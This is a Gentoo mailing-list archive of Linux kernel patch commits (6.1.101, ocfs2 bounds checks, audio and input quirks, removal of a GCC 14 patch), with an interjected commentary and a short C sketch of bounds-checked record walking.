+@@ -3354,14 +3363,16 @@ static int ocfs2_find_dir_space_id(struct inode *dir, struct buffer_head *di_bh,
+ 	else
+ 		free_space = dir->i_sb->s_blocksize - i_size_read(dir);
+ 
+-	de_buf = di->id2.i_data.id_data;
++	first_de = di->id2.i_data.id_data;
++	de_buf = first_de;
+ 	limit = de_buf + i_size_read(dir);
+ 	rec_len = OCFS2_DIR_REC_LEN(namelen);
+ 
+ 	while (de_buf < limit) {
+ 		de = (struct ocfs2_dir_entry *)de_buf;
+ 
+-		if (!ocfs2_check_dir_entry(dir, de, di_bh, offset)) {
++		if (!ocfs2_check_dir_entry(dir, de, di_bh, first_de,
++					   i_size_read(dir), offset)) {
+ 			ret = -ENOENT;
+ 			goto out;
+ 		}
+@@ -3443,7 +3454,8 @@ static int ocfs2_find_dir_space_el(struct inode *dir, const char *name,
+ 			/* move to next block */
+ 			de = (struct ocfs2_dir_entry *) bh->b_data;
+ 		}
+-		if (!ocfs2_check_dir_entry(dir, de, bh, offset)) {
++		if (!ocfs2_check_dir_entry(dir, de, bh, bh->b_data, blocksize,
++					   offset)) {
+ 			status = -ENOENT;
+ 			goto bail;
+ 		}
+diff --git a/sound/core/pcm_dmaengine.c b/sound/core/pcm_dmaengine.c
+index e299e8634751f..62489677f3947 100644
+--- a/sound/core/pcm_dmaengine.c
++++ b/sound/core/pcm_dmaengine.c
+@@ -352,8 +352,12 @@ EXPORT_SYMBOL_GPL(snd_dmaengine_pcm_open_request_chan);
+ int snd_dmaengine_pcm_sync_stop(struct snd_pcm_substream *substream)
+ {
+ 	struct dmaengine_pcm_runtime_data *prtd = substream_to_prtd(substream);
++	struct dma_tx_state state;
++	enum dma_status status;
+ 
+-	dmaengine_synchronize(prtd->dma_chan);
++	status = dmaengine_tx_status(prtd->dma_chan, prtd->cookie, &state);
++	if (status != DMA_PAUSED)
++		dmaengine_synchronize(prtd->dma_chan);
+ 
+ 	return 0;
+ }
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 66b8adb2069af..e0df44bfda4e6 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9928,6 +9928,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x10cf, 0x1845, "Lifebook U904", ALC269_FIXUP_LIFEBOOK_EXTMIC),
+ 	SND_PCI_QUIRK(0x10ec, 0x10f2, "Intel Reference board", ALC700_FIXUP_INTEL_REFERENCE),
+ 	SND_PCI_QUIRK(0x10ec, 0x118c, "Medion EE4254 MD62100", ALC256_FIXUP_MEDION_HEADSET_NO_PRESENCE),
++	SND_PCI_QUIRK(0x10ec, 0x119e, "Positivo SU C1400", ALC269_FIXUP_ASPIRE_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x10ec, 0x11bc, "VAIO VJFE-IL", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x10ec, 0x1230, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0x10ec, 0x124c, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+@@ -9941,6 +9942,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x144d, 0xc189, "Samsung Galaxy Flex Book (NT950QCG-X716)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x144d, 0xc18a, "Samsung Galaxy Book Ion (NP930XCJ-K01US)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x144d, 0xc1a3, "Samsung Galaxy Book Pro (NP935XDB-KC1SE)", ALC298_FIXUP_SAMSUNG_AMP),
++	SND_PCI_QUIRK(0x144d, 0xc1a4, "Samsung Galaxy Book Pro 360 (NT935QBD)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x144d, 0xc1a6, "Samsung Galaxy Book Pro 360 (NP930QBD)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x144d, 0xc740, "Samsung Ativ book 8 (NP870Z5G)", ALC269_FIXUP_ATIV_BOOK_8),
+ 	SND_PCI_QUIRK(0x144d, 0xc812, "Samsung Notebook Pen S (NT950SBE-X58)", ALC298_FIXUP_SAMSUNG_AMP),
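
A recurring pattern in the fixes above (jfs_getxattr, jfs_listxattr, and the
ocfs2 directory-entry checks) is bounds-validating a walk over variable-length
records before dereferencing them. A self-contained sketch of that pattern,
under an assumed record layout (struct rec and walk_records() are
hypothetical, not the jfs or ocfs2 on-disk structures):

	#include <stddef.h>
	#include <stdint.h>

	struct rec {
		uint8_t len;	/* total record length, >= sizeof(struct rec) */
		char data[];
	};

	/* Returns the number of valid records, or -1 on a malformed list. */
	static int walk_records(const void *buf, size_t size)
	{
		const char *p = buf, *end = p + size;
		int n = 0;

		while (p < end) {
			const struct rec *r = (const struct rec *)p;

			/* The header must fit before r->len is read ... */
			if ((size_t)(end - p) < sizeof(*r))
				return -1;
			/* ... and the whole record must fit and advance p. */
			if (r->len < sizeof(*r) || r->len > (size_t)(end - p))
				return -1;

			n++;
			p += r->len;
		}
		return n;
	}

	int main(void)
	{
		const char good[] = { 3, 'h', 'i', 2, '!' };
		const char bad[]  = { 9, 'x' };	/* claims bytes past the end */

		return (walk_records(good, sizeof(good)) == 2 &&
			walk_records(bad, sizeof(bad)) == -1) ? 0 : 1;
	}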


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-07-25 12:15 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-07-25 12:15 UTC (permalink / raw
  To: gentoo-commits

commit:     b095c1112333de93151068a47233a53baa9b2e2b
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Jul 25 12:15:21 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Jul 25 12:15:21 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=b095c111

Remove redundant patch

Removed:
2940_handle-gcc-14-last-stmt-rename.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                               |  4 ----
 2940_handle-gcc-14-last-stmt-rename.patch | 31 -------------------------------
 2 files changed, 35 deletions(-)

diff --git a/0000_README b/0000_README
index 9ad98dff..ad9ca363 100644
--- a/0000_README
+++ b/0000_README
@@ -479,10 +479,6 @@ Patch:  2920_sign-file-patch-for-libressl.patch
 From:   https://bugs.gentoo.org/717166
 Desc:   sign-file: full functionality with modern LibreSSL
 
-Patch:  2940_handle-gcc-14-last-stmt-rename.patch
-From:   https://lore.kernel.org/all/20230811060545.never.564-kees@kernel.org/#Z31scripts:gcc-plugins:gcc-common.h
-Desc:   gcc-plugins: Rename last_stmt() for GCC 14+
-
 Patch:  2950_kbuild-CRC32-1MB-dict-xz-modules.patch
 From:   https://git.kernel.org/pub/scm/linux/kernel/git/masahiroy/linux-kbuild.git/commit/?h=kbuild&id=fbf5892df21a8ccfcb2fda0fd65bc3169c89ed28
 Desc:   kbuild: Use CRC32 and a 1MiB dictionary for XZ compressed modules

diff --git a/2940_handle-gcc-14-last-stmt-rename.patch b/2940_handle-gcc-14-last-stmt-rename.patch
deleted file mode 100644
index b04ce8da..00000000
--- a/2940_handle-gcc-14-last-stmt-rename.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From: Kees Cook <keescook@chromium.org>
-To: linux-hardening@vger.kernel.org
-Cc: Kees Cook <keescook@chromium.org>, linux-kernel@vger.kernel.org
-Subject: [PATCH] gcc-plugins: Rename last_stmt() for GCC 14+
-Date: Thu, 10 Aug 2023 23:05:49 -0700	[thread overview]
-Message-ID: <20230811060545.never.564-kees@kernel.org> (raw)
-
-In GCC 14, last_stmt() was renamed to last_nondebug_stmt(). Add a helper
-macro to handle the renaming.
-
-Cc: linux-hardening@vger.kernel.org
-Signed-off-by: Kees Cook <keescook@chromium.org>
----
- scripts/gcc-plugins/gcc-common.h | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/scripts/gcc-plugins/gcc-common.h b/scripts/gcc-plugins/gcc-common.h
-index 84c730da36dd..1ae39b9f4a95 100644
---- a/scripts/gcc-plugins/gcc-common.h
-+++ b/scripts/gcc-plugins/gcc-common.h
-@@ -440,4 +440,8 @@ static inline void debug_gimple_stmt(const_gimple s)
- #define SET_DECL_MODE(decl, mode)	DECL_MODE(decl) = (mode)
- #endif
- 
-+#if BUILDING_GCC_VERSION >= 14000
-+#define last_stmt(x)			last_nondebug_stmt(x)
-+#endif
-+
- #endif
--- 
-2.34.1


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-07-25 12:09 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-07-25 12:09 UTC (permalink / raw
  To: gentoo-commits

commit:     ffea8e5a422b2de097bb0f5ec35ab03df8b3a177
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Jul 25 12:09:41 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Jul 25 12:09:41 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=ffea8e5a

Linux patch 6.1.101

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |    4 +
 1100_linux-6.1.101.patch | 3620 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 3624 insertions(+)

diff --git a/0000_README b/0000_README
index 2650897a..9ad98dff 100644
--- a/0000_README
+++ b/0000_README
@@ -443,6 +443,10 @@ Patch:  1099_linux-6.1.100.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.100
 
+Patch:  1100_linux-6.1.101.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.101
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1100_linux-6.1.101.patch b/1100_linux-6.1.101.patch
new file mode 100644
index 00000000..221608ca
--- /dev/null
+++ b/1100_linux-6.1.101.patch
@@ -0,0 +1,3620 @@
+diff --git a/Makefile b/Makefile
+index 54099eefe18ca..c2dc43c862dbf 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 100
++SUBLEVEL = 101
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/include/asm/uaccess.h b/arch/arm/include/asm/uaccess.h
+index 2fcbec9c306cf..d80a70dfac5c3 100644
+--- a/arch/arm/include/asm/uaccess.h
++++ b/arch/arm/include/asm/uaccess.h
+@@ -109,16 +109,6 @@ extern int __get_user_64t_1(void *);
+ extern int __get_user_64t_2(void *);
+ extern int __get_user_64t_4(void *);
+ 
+-#define __GUP_CLOBBER_1	"lr", "cc"
+-#ifdef CONFIG_CPU_USE_DOMAINS
+-#define __GUP_CLOBBER_2	"ip", "lr", "cc"
+-#else
+-#define __GUP_CLOBBER_2 "lr", "cc"
+-#endif
+-#define __GUP_CLOBBER_4	"lr", "cc"
+-#define __GUP_CLOBBER_32t_8 "lr", "cc"
+-#define __GUP_CLOBBER_8	"lr", "cc"
+-
+ #define __get_user_x(__r2, __p, __e, __l, __s)				\
+ 	   __asm__ __volatile__ (					\
+ 		__asmeq("%0", "r0") __asmeq("%1", "r2")			\
+@@ -126,7 +116,7 @@ extern int __get_user_64t_4(void *);
+ 		"bl	__get_user_" #__s				\
+ 		: "=&r" (__e), "=r" (__r2)				\
+ 		: "0" (__p), "r" (__l)					\
+-		: __GUP_CLOBBER_##__s)
++		: "ip", "lr", "cc")
+ 
+ /* narrowing a double-word get into a single 32bit word register: */
+ #ifdef __ARMEB__
+@@ -148,7 +138,7 @@ extern int __get_user_64t_4(void *);
+ 		"bl	__get_user_64t_" #__s				\
+ 		: "=&r" (__e), "=r" (__r2)				\
+ 		: "0" (__p), "r" (__l)					\
+-		: __GUP_CLOBBER_##__s)
++		: "ip", "lr", "cc")
+ #else
+ #define __get_user_x_64t __get_user_x
+ #endif
+diff --git a/arch/mips/kernel/syscalls/syscall_o32.tbl b/arch/mips/kernel/syscalls/syscall_o32.tbl
+index 7ab572040f534..20a6434f56361 100644
+--- a/arch/mips/kernel/syscalls/syscall_o32.tbl
++++ b/arch/mips/kernel/syscalls/syscall_o32.tbl
+@@ -27,7 +27,7 @@
+ 17	o32	break				sys_ni_syscall
+ # 18 was sys_stat
+ 18	o32	unused18			sys_ni_syscall
+-19	o32	lseek				sys_lseek
++19	o32	lseek				sys_lseek			compat_sys_lseek
+ 20	o32	getpid				sys_getpid
+ 21	o32	mount				sys_mount
+ 22	o32	umount				sys_oldumount
+diff --git a/arch/powerpc/kernel/eeh_pe.c b/arch/powerpc/kernel/eeh_pe.c
+index d2873d17d2b15..e4624d7896294 100644
+--- a/arch/powerpc/kernel/eeh_pe.c
++++ b/arch/powerpc/kernel/eeh_pe.c
+@@ -850,6 +850,7 @@ struct pci_bus *eeh_pe_bus_get(struct eeh_pe *pe)
+ {
+ 	struct eeh_dev *edev;
+ 	struct pci_dev *pdev;
++	struct pci_bus *bus = NULL;
+ 
+ 	if (pe->type & EEH_PE_PHB)
+ 		return pe->phb->bus;
+@@ -860,9 +861,11 @@ struct pci_bus *eeh_pe_bus_get(struct eeh_pe *pe)
+ 
+ 	/* Retrieve the parent PCI bus of first (top) PCI device */
+ 	edev = list_first_entry_or_null(&pe->edevs, struct eeh_dev, entry);
++	pci_lock_rescan_remove();
+ 	pdev = eeh_dev_to_pci_dev(edev);
+ 	if (pdev)
+-		return pdev->bus;
++		bus = pdev->bus;
++	pci_unlock_rescan_remove();
+ 
+-	return NULL;
++	return bus;
+ }
+diff --git a/arch/powerpc/kvm/book3s_64_vio.c b/arch/powerpc/kvm/book3s_64_vio.c
+index 40864373ef876..549e33d4ecd62 100644
+--- a/arch/powerpc/kvm/book3s_64_vio.c
++++ b/arch/powerpc/kvm/book3s_64_vio.c
+@@ -129,14 +129,16 @@ extern long kvm_spapr_tce_attach_iommu_group(struct kvm *kvm, int tablefd,
+ 	}
+ 	rcu_read_unlock();
+ 
+-	fdput(f);
+-
+-	if (!found)
++	if (!found) {
++		fdput(f);
+ 		return -EINVAL;
++	}
+ 
+ 	table_group = iommu_group_get_iommudata(grp);
+-	if (WARN_ON(!table_group))
++	if (WARN_ON(!table_group)) {
++		fdput(f);
+ 		return -EFAULT;
++	}
+ 
+ 	for (i = 0; i < IOMMU_TABLE_GROUP_MAX_TABLES; ++i) {
+ 		struct iommu_table *tbltmp = table_group->tables[i];
+@@ -157,8 +159,10 @@ extern long kvm_spapr_tce_attach_iommu_group(struct kvm *kvm, int tablefd,
+ 			break;
+ 		}
+ 	}
+-	if (!tbl)
++	if (!tbl) {
++		fdput(f);
+ 		return -EINVAL;
++	}
+ 
+ 	rcu_read_lock();
+ 	list_for_each_entry_rcu(stit, &stt->iommu_tables, next) {
+@@ -169,6 +173,7 @@ extern long kvm_spapr_tce_attach_iommu_group(struct kvm *kvm, int tablefd,
+ 			/* stit is being destroyed */
+ 			iommu_tce_table_put(tbl);
+ 			rcu_read_unlock();
++			fdput(f);
+ 			return -ENOTTY;
+ 		}
+ 		/*
+@@ -176,6 +181,7 @@ extern long kvm_spapr_tce_attach_iommu_group(struct kvm *kvm, int tablefd,
+ 		 * its KVM reference counter and can return.
+ 		 */
+ 		rcu_read_unlock();
++		fdput(f);
+ 		return 0;
+ 	}
+ 	rcu_read_unlock();
+@@ -183,6 +189,7 @@ extern long kvm_spapr_tce_attach_iommu_group(struct kvm *kvm, int tablefd,
+ 	stit = kzalloc(sizeof(*stit), GFP_KERNEL);
+ 	if (!stit) {
+ 		iommu_tce_table_put(tbl);
++		fdput(f);
+ 		return -ENOMEM;
+ 	}
+ 
+@@ -191,6 +198,7 @@ extern long kvm_spapr_tce_attach_iommu_group(struct kvm *kvm, int tablefd,
+ 
+ 	list_add_rcu(&stit->next, &stt->iommu_tables);
+ 
++	fdput(f);
+ 	return 0;
+ }
+ 
+diff --git a/arch/powerpc/platforms/pseries/setup.c b/arch/powerpc/platforms/pseries/setup.c
+index df07726192000..c2e6b3a0469d1 100644
+--- a/arch/powerpc/platforms/pseries/setup.c
++++ b/arch/powerpc/platforms/pseries/setup.c
+@@ -342,8 +342,8 @@ static int alloc_dispatch_log_kmem_cache(void)
+ {
+ 	void (*ctor)(void *) = get_dtl_cache_ctor();
+ 
+-	dtl_cache = kmem_cache_create("dtl", DISPATCH_LOG_BYTES,
+-						DISPATCH_LOG_BYTES, 0, ctor);
++	dtl_cache = kmem_cache_create_usercopy("dtl", DISPATCH_LOG_BYTES,
++						DISPATCH_LOG_BYTES, 0, 0, DISPATCH_LOG_BYTES, ctor);
+ 	if (!dtl_cache) {
+ 		pr_warn("Failed to create dispatch trace log buffer cache\n");
+ 		pr_warn("Stolen time statistics will be unreliable\n");
+diff --git a/arch/riscv/kernel/stacktrace.c b/arch/riscv/kernel/stacktrace.c
+index 0d3f00eb0baee..10e311b2759d3 100644
+--- a/arch/riscv/kernel/stacktrace.c
++++ b/arch/riscv/kernel/stacktrace.c
+@@ -32,6 +32,7 @@ void notrace walk_stackframe(struct task_struct *task, struct pt_regs *regs,
+ 			     bool (*fn)(void *, unsigned long), void *arg)
+ {
+ 	unsigned long fp, sp, pc;
++	int graph_idx = 0;
+ 	int level = 0;
+ 
+ 	if (regs) {
+@@ -68,7 +69,7 @@ void notrace walk_stackframe(struct task_struct *task, struct pt_regs *regs,
+ 			pc = regs->ra;
+ 		} else {
+ 			fp = frame->fp;
+-			pc = ftrace_graph_ret_addr(current, NULL, frame->ra,
++			pc = ftrace_graph_ret_addr(current, &graph_idx, frame->ra,
+ 						   &frame->ra);
+ 			if (pc == (unsigned long)ret_from_exception) {
+ 				if (unlikely(!__kernel_text_address(pc) || !fn(arg, pc)))
+diff --git a/drivers/acpi/ec.c b/drivers/acpi/ec.c
+index 77d1f2cb89ef3..7589908b358e3 100644
+--- a/drivers/acpi/ec.c
++++ b/drivers/acpi/ec.c
+@@ -1314,10 +1314,13 @@ acpi_ec_space_handler(u32 function, acpi_physical_address address,
+ 	if (ec->busy_polling || bits > 8)
+ 		acpi_ec_burst_enable(ec);
+ 
+-	for (i = 0; i < bytes; ++i, ++address, ++value)
++	for (i = 0; i < bytes; ++i, ++address, ++value) {
+ 		result = (function == ACPI_READ) ?
+ 			acpi_ec_read(ec, address, value) :
+ 			acpi_ec_write(ec, address, *value);
++		if (result < 0)
++			break;
++	}
+ 
+ 	if (ec->busy_polling || bits > 8)
+ 		acpi_ec_burst_disable(ec);
+@@ -1329,8 +1332,10 @@ acpi_ec_space_handler(u32 function, acpi_physical_address address,
+ 		return AE_NOT_FOUND;
+ 	case -ETIME:
+ 		return AE_TIME;
+-	default:
++	case 0:
+ 		return AE_OK;
++	default:
++		return AE_ERROR;
+ 	}
+ }
+ 
+diff --git a/drivers/block/null_blk/main.c b/drivers/block/null_blk/main.c
+index 220cedda2ca7d..4d78b5583dc6a 100644
+--- a/drivers/block/null_blk/main.c
++++ b/drivers/block/null_blk/main.c
+@@ -1958,8 +1958,8 @@ static int null_validate_conf(struct nullb_device *dev)
+ 		return -EINVAL;
+ 	}
+ 
+-	dev->blocksize = round_down(dev->blocksize, 512);
+-	dev->blocksize = clamp_t(unsigned int, dev->blocksize, 512, 4096);
++	if (blk_validate_block_size(dev->blocksize))
++		return -EINVAL;
+ 
+ 	if (dev->queue_mode == NULL_Q_MQ && dev->use_per_node_hctx) {
+ 		if (dev->submit_queues != nr_online_nodes)
+diff --git a/drivers/firmware/efi/libstub/zboot.lds b/drivers/firmware/efi/libstub/zboot.lds
+index 93d33f68333b2..a7fffbad6d46a 100644
+--- a/drivers/firmware/efi/libstub/zboot.lds
++++ b/drivers/firmware/efi/libstub/zboot.lds
+@@ -34,6 +34,7 @@ SECTIONS
+ 	}
+ 
+ 	/DISCARD/ : {
++		*(.discard .discard.*)
+ 		*(.modinfo .init.modinfo)
+ 	}
+ }
+diff --git a/drivers/gpio/gpio-pca953x.c b/drivers/gpio/gpio-pca953x.c
+index bf21803a00363..9ce54bf2030d7 100644
+--- a/drivers/gpio/gpio-pca953x.c
++++ b/drivers/gpio/gpio-pca953x.c
+@@ -768,6 +768,8 @@ static void pca953x_irq_bus_sync_unlock(struct irq_data *d)
+ 	int level;
+ 
+ 	if (chip->driver_data & PCA_PCAL) {
++		guard(mutex)(&chip->i2c_lock);
++
+ 		/* Enable latch on interrupt-enabled inputs */
+ 		pca953x_write_regs(chip, PCAL953X_IN_LATCH, chip->irq_mask);
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+index cc8c1a48c5c4d..76df036fb2f34 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+@@ -3338,6 +3338,9 @@ void dml32_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 							&mode_lib->vba.UrgentBurstFactorLumaPre[k],
+ 							&mode_lib->vba.UrgentBurstFactorChromaPre[k],
+ 							&mode_lib->vba.NotUrgentLatencyHidingPre[k]);
++
++					v->cursor_bw_pre[k] = mode_lib->vba.NumberOfCursors[k] * mode_lib->vba.CursorWidth[k][0] * mode_lib->vba.CursorBPP[k][0] /
++							8.0 / (mode_lib->vba.HTotal[k] / mode_lib->vba.PixelClock[k]) * v->VRatioPreY[i][j][k];
+ 				}
+ 
+ 				{
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index 426bbee2d9f5e..5db52d6c5c35c 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -202,6 +202,12 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_MATCH(DMI_BOARD_NAME, "NEXT"),
+ 		},
+ 		.driver_data = (void *)&lcd800x1280_rightside_up,
++	}, {	/* AYA NEO KUN */
++		.matches = {
++		  DMI_EXACT_MATCH(DMI_BOARD_VENDOR, "AYANEO"),
++		  DMI_MATCH(DMI_BOARD_NAME, "KUN"),
++		},
++		.driver_data = (void *)&lcd1600x2560_rightside_up,
+ 	}, {	/* Chuwi HiBook (CWI514) */
+ 		.matches = {
+ 			DMI_MATCH(DMI_BOARD_VENDOR, "Hampoo"),
+diff --git a/drivers/gpu/drm/radeon/radeon_gem.c b/drivers/gpu/drm/radeon/radeon_gem.c
+index 75d79c3110389..3388a3d21d2c0 100644
+--- a/drivers/gpu/drm/radeon/radeon_gem.c
++++ b/drivers/gpu/drm/radeon/radeon_gem.c
+@@ -657,7 +657,7 @@ static void radeon_gem_va_update_vm(struct radeon_device *rdev,
+ 	if (r)
+ 		goto error_unlock;
+ 
+-	if (bo_va->it.start)
++	if (bo_va->it.start && bo_va->bo)
+ 		r = radeon_vm_bo_update(rdev, bo_va, bo_va->bo->tbo.resource);
+ 
+ error_unlock:
+diff --git a/drivers/gpu/drm/vmwgfx/Kconfig b/drivers/gpu/drm/vmwgfx/Kconfig
+index faddae3d6ac2e..6f1ac940cbae7 100644
+--- a/drivers/gpu/drm/vmwgfx/Kconfig
++++ b/drivers/gpu/drm/vmwgfx/Kconfig
+@@ -2,7 +2,7 @@
+ config DRM_VMWGFX
+ 	tristate "DRM driver for VMware Virtual GPU"
+ 	depends on DRM && PCI && MMU
+-	depends on X86 || ARM64
++	depends on (X86 && HYPERVISOR_GUEST) || ARM64
+ 	select DRM_TTM
+ 	select DRM_TTM_HELPER
+ 	select MAPPING_DIRTY_HELPERS
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 97745a1f9c6f1..0e5b2b3dea4d0 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -417,6 +417,8 @@
+ #define I2C_DEVICE_ID_HP_SPECTRE_X360_13_AW0020NG  0x29DF
+ #define I2C_DEVICE_ID_ASUS_TP420IA_TOUCHSCREEN 0x2BC8
+ #define I2C_DEVICE_ID_ASUS_GV301RA_TOUCHSCREEN 0x2C82
++#define I2C_DEVICE_ID_ASUS_UX3402_TOUCHSCREEN 0x2F2C
++#define I2C_DEVICE_ID_ASUS_UX6404_TOUCHSCREEN 0x4116
+ #define USB_DEVICE_ID_ASUS_UX550VE_TOUCHSCREEN	0x2544
+ #define USB_DEVICE_ID_ASUS_UX550_TOUCHSCREEN	0x2706
+ #define I2C_DEVICE_ID_SURFACE_GO_TOUCHSCREEN	0x261A
+diff --git a/drivers/hid/hid-input.c b/drivers/hid/hid-input.c
+index 4ba5df3c1e039..b0091819fd58a 100644
+--- a/drivers/hid/hid-input.c
++++ b/drivers/hid/hid-input.c
+@@ -374,6 +374,10 @@ static const struct hid_device_id hid_battery_quirks[] = {
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_ASUS_GV301RA_TOUCHSCREEN),
+ 	  HID_BATTERY_QUIRK_IGNORE },
++	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_ASUS_UX3402_TOUCHSCREEN),
++	  HID_BATTERY_QUIRK_IGNORE },
++	{ HID_I2C_DEVICE(USB_VENDOR_ID_ELAN, I2C_DEVICE_ID_ASUS_UX6404_TOUCHSCREEN),
++	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELAN, USB_DEVICE_ID_ASUS_UX550_TOUCHSCREEN),
+ 	  HID_BATTERY_QUIRK_IGNORE },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_ELAN, USB_DEVICE_ID_ASUS_UX550VE_TOUCHSCREEN),
+diff --git a/drivers/input/mouse/elantech.c b/drivers/input/mouse/elantech.c
+index 4e38229404b4b..b4723ea395eb9 100644
+--- a/drivers/input/mouse/elantech.c
++++ b/drivers/input/mouse/elantech.c
+@@ -1476,16 +1476,47 @@ static void elantech_disconnect(struct psmouse *psmouse)
+ 	psmouse->private = NULL;
+ }
+ 
++/*
++ * Some hw_version 4 models fail to properly activate absolute mode on
++ * resume without going through disable/enable cycle.
++ */
++static const struct dmi_system_id elantech_needs_reenable[] = {
++#if defined(CONFIG_DMI) && defined(CONFIG_X86)
++	{
++		/* Lenovo N24 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "81AF"),
++		},
++	},
++#endif
++	{ }
++};
++
+ /*
+  * Put the touchpad back into absolute mode when reconnecting
+  */
+ static int elantech_reconnect(struct psmouse *psmouse)
+ {
++	int err;
++
+ 	psmouse_reset(psmouse);
+ 
+ 	if (elantech_detect(psmouse, 0))
+ 		return -1;
+ 
++	if (dmi_check_system(elantech_needs_reenable)) {
++		err = ps2_command(&psmouse->ps2dev, NULL, PSMOUSE_CMD_DISABLE);
++		if (err)
++			psmouse_warn(psmouse, "failed to deactivate mouse on %s: %d\n",
++				     psmouse->ps2dev.serio->phys, err);
++
++		err = ps2_command(&psmouse->ps2dev, NULL, PSMOUSE_CMD_ENABLE);
++		if (err)
++			psmouse_warn(psmouse, "failed to reactivate mouse on %s: %d\n",
++				     psmouse->ps2dev.serio->phys, err);
++	}
++
+ 	if (elantech_set_absolute_mode(psmouse)) {
+ 		psmouse_err(psmouse,
+ 			    "failed to put touchpad back into absolute mode.\n");
+diff --git a/drivers/input/serio/i8042-acpipnpio.h b/drivers/input/serio/i8042-acpipnpio.h
+index dfc6c581873b7..5b50475ec4140 100644
+--- a/drivers/input/serio/i8042-acpipnpio.h
++++ b/drivers/input/serio/i8042-acpipnpio.h
+@@ -76,7 +76,7 @@ static inline void i8042_write_command(int val)
+ #define SERIO_QUIRK_PROBE_DEFER		BIT(5)
+ #define SERIO_QUIRK_RESET_ALWAYS	BIT(6)
+ #define SERIO_QUIRK_RESET_NEVER		BIT(7)
+-#define SERIO_QUIRK_DIECT		BIT(8)
++#define SERIO_QUIRK_DIRECT		BIT(8)
+ #define SERIO_QUIRK_DUMBKBD		BIT(9)
+ #define SERIO_QUIRK_NOLOOP		BIT(10)
+ #define SERIO_QUIRK_NOTIMEOUT		BIT(11)
+@@ -1332,6 +1332,20 @@ static const struct dmi_system_id i8042_dmi_quirk_table[] __initconst = {
+ 		.driver_data = (void *)(SERIO_QUIRK_NOMUX | SERIO_QUIRK_RESET_ALWAYS |
+ 					SERIO_QUIRK_NOLOOP | SERIO_QUIRK_NOPNP)
+ 	},
++	{
++		/*
++		 * The Ayaneo Kun is a handheld device where some the buttons
++		 * are handled by an AT keyboard. The keyboard is usually
++		 * detected as raw, but sometimes, usually after a cold boot,
++		 * it is detected as translated. Make sure that the keyboard
++		 * is always in raw mode.
++		 */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_BOARD_VENDOR, "AYANEO"),
++			DMI_MATCH(DMI_BOARD_NAME, "KUN"),
++		},
++		.driver_data = (void *)(SERIO_QUIRK_DIRECT)
++	},
+ 	{ }
+ };
+ 
+@@ -1655,7 +1669,7 @@ static void __init i8042_check_quirks(void)
+ 		if (quirks & SERIO_QUIRK_RESET_NEVER)
